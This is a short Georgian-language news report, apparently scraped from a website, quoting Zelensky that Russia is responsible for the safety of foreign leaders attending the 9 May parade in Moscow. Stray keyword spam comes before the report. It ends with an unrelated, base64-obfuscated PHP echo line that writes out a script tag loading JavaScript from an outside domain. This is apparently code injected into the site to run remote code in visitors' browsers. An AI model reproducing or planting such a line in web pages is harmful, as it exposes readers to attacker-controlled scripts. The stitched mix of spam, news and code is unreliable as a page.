gorgia
ავერსი jaluzi

უკრაინის პრეზიდენტის, ვოლოდიმირ ზელენსკის განცხადებით, 9 მაისს მოსკოვში მეორე მსოფლიო ომში გამარჯვებასთან დაკავშირებით დაგეგმილ აღლუმში მონაწილე მსოფლიო ლიდერების უსაფრთხოებაზე პასუხისმგებელი მოსკოვია.

"ჩვენი პოზიცია ძალიან მარტივია ყველა ქვეყნის [ლიდერის, მოქალაქის] მიმართ, რომელსაც რუსეთში უმგზავრია ან 9 მაისს აპირებს გამგზავრებას – ჩვენ ვერ ავიღებთ პასუხისმგებლობას იმაზე, რაც რუსეთის ფედერაციის ტერიტორიაზე ხდება. თქვენს უსაფრთხოებას ისინი უზრუნველყოფენ". - თქვა ზელენსკიმ.

ცნობისთვის, რუსულმა გამოცემა РБК-მ ცოტა ხნის წინ იმ ლიდერების სია გამოაქვეყნა, რომლებიც 9 მაისს მოსკოვში მეორე მსოფლიო ომში გამარჯვებასთან დაკავშირებით დაგეგმილ აღლუმს დაესწრებიან.

189
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");